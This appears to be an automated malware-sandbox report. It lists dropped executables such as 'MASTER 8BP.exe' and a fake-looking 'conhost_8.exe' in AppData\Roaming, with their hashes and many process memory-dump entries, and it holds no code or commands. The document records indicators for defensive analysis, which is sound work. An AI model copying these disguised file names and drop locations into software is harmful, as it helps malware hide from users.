976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
\Users\Admin\AppData\Local\Temp\MASTER 8BP.exe

Filesize
2.1MB

MD5
3ee631ed0386c88faaad83c97ade2dcd

SHA1
308ac9da54565404430b220881c76f49793c0e9f

SHA256
be66aee2bca9fe25b83908cb03dd991670725c754df97b2ea66eeca5e3d1f8c6

SHA512
976f1d04125ff29c4ef90efc2fd91db9cb146261a14c68a04169c955755a53d3f8c436c5c41a93564b4aa4800317e0b61b170ebc409eb346f5ae29762e518e0d

Download Submit
\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe

Filesize
1.6MB

MD5
0ea53df77445bfbde349bd4eed09dae1

SHA1
b4df1111097fbfb9a9ea3ad86ac130716fea12d0

SHA256
83f1a1d7936de3a686abf664e40790ab48bc2043cee630a7f96954935886f335

SHA512
4396c5815c3e2613083e4866d60a363f7cc6a38647abcacfcc7500d2b1654da4821b0c597368c490325196607c40ad80f19b12f87e8594c1e88f2a02a7a73357

Download Submit
\Users\Admin\AppData\Roaming\conhost_8.exe

Filesize
2.0MB

MD5
b521b2a220a99d820b688d4ad5db8067

SHA1
08e97a2e4871b789d3388fd51479710626b69a92

SHA256
55371f430ea0369bf4e079f39558a4c6c5462b19ddc9f16f064286288f50a12b

SHA512
2e4d9b8d556a609abae4dfedf18136618fb1bb8f77d3a596c97bffc2edde9dec147456dcf586c00de9a438b789599fe288de8117109b6b04db9045279b3caca1

Download Submit
memory/284-238-0x000000013FAD0000-0x000000013FCE5000-memory.dmp

Filesize
2.1MB

Download
memory/284-190-0x000000013FAD0000-0x000000013FCE5000-memory.dmp

Filesize
2.1MB

Download
memory/284-203-0x000000013FAD0000-0x000000013FCE5000-memory.dmp

Filesize
2.1MB

Download
memory/284-233-0x000000013FAD0000-0x000000013FCE5000-memory.dmp

Filesize
2.1MB

Download
memory/1116-197-0x0000000000F10000-0x0000000000F18000-memory.dmp

Filesize
32KB

Download
memory/1116-199-0x00000000011EB000-0x0000000001222000-memory.dmp

Filesize
220KB

Download
memory/1116-198-0x00000000011E4000-0x00000000011E7000-memory.dmp

Filesize
12KB

Download
memory/1300-86-0x0000000000360000-0x0000000000376000-memory.dmp

Filesize
88KB

Download
memory/1300-88-0x0000000000650000-0x0000000000660000-memory.dmp

Filesize
64KB

Download
memory/1300-87-0x0000000000380000-0x0000000000392000-memory.dmp

Filesize
72KB

Download
memory/1300-91-0x0000000000660000-0x000000000066C000-memory.dmp

Filesize
48KB

Download
memory/1300-92-0x00000000007B0000-0x00000000007BE000-memory.dmp

Filesize
56KB

Download
memory/1300-116-0x000000001AFC0000-0x000000001B040000-memory.dmp

Filesize
512KB

Download
memory/1300-90-0x0000000000640000-0x0000000000652000-memory.dmp

Filesize
72KB

Download
memory/1300-118-0x000000001AFC0000-0x000000001B040000-memory.dmp

Filesize
512KB

Download
memory/1300-89-0x00000000005B0000-0x00000000005BA000-memory.dmp

Filesize
40KB

Download
memory/1300-84-0x000000001AFC0000-0x000000001B040000-memory.dmp

Filesize
512KB

Download
memory/1300-85-0x0000000000340000-0x000000000035C000-memory.dmp

Filesize
112KB

Download
memory/1300-82-0x0000000000390000-0x000000000053E000-memory.dmp

Filesize
1.7MB

Download
memory/1300-95-0x00000000007D0000-0x00000000007DC000-memory.dmp

Filesize
48KB

Download
memory/1300-94-0x00000000007C0000-0x00000000007CC000-memory.dmp

Filesize
48KB

Download
memory/1300-93-0x00000000006F0000-0x00000000006F8000-memory.dmp

Filesize
32KB

Download
memory/1532-172-0x000000013F140000-0x000000013F355000-memory.dmp

Filesize
2.1MB

Download
memory/1532-114-0x000000013F140000-0x000000013F355000-memory.dmp

Filesize
2.1MB

Download
memory/1852-77-0x0000000000400000-0x00000000015D9000-memory.dmp

Filesize
17.8MB

Download
memory/1852-54-0x0000000000400000-0x00000000015D9000-memory.dmp

Filesize
17.8MB

Download
memory/1852-76-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

Filesize
3.8MB

Download
memory/1852-75-0x0000000000400000-0x00000000015D9000-memory.dmp

Filesize
17.8MB

Download
memory/2296-145-0x000000000283B000-0x0000000002872000-memory.dmp

Filesize
220KB

Download
memory/2296-144-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2296-143-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2296-142-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2296-141-0x0000000001F90000-0x0000000001F98000-memory.dmp

Filesize
32KB

Download
memory/2296-140-0x000000001B400000-0x000000001B6E2000-memory.dmp

Filesize
2.9MB

Download
memory/2400-200-0x000000000120B000-0x0000000001242000-memory.dmp

Filesize
220KB

Download
memory/2468-188-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-161-0x0000000000440000-0x0000000000452000-memory.dmp

Filesize
72KB

Download
memory/2468-148-0x0000000001310000-0x00000000014BE000-memory.dmp

Filesize
1.7MB

Download
memory/2468-235-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-173-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-185-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-186-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-187-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-234-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-189-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-156-0x0000000000210000-0x0000000000222000-memory.dmp

Filesize
72KB

Download
memory/2468-191-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-192-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-193-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-194-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-195-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-196-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-181-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-224-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-217-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-160-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-201-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-202-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-213-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2468-209-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2480-158-0x00000000022C4000-0x00000000022C7000-memory.dmp

Filesize
12KB

Download
memory/2480-159-0x00000000022CB000-0x0000000002302000-memory.dmp

Filesize
220KB

Download
memory/2480-157-0x00000000022C0000-0x0000000002340000-memory.dmp

Filesize
512KB

Download
memory/2480-155-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2480-154-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/2680-168-0x0000000002864000-0x0000000002867000-memory.dmp

Filesize
12KB

Download
memory/2680-169-0x000000000286B000-0x00000000028A2000-memory.dmp

Filesize
220KB

Download
memory/2840-239-0x0000000140000000-0x0000000140049000-memory.dmp

Filesize
292KB

Download
memory/2968-179-0x00000000024F4000-0x00000000024F7000-memory.dmp

Filesize
12KB

Download
memory/2968-180-0x00000000024FB000-0x0000000002532000-memory.dmp

Filesize
220KB

Download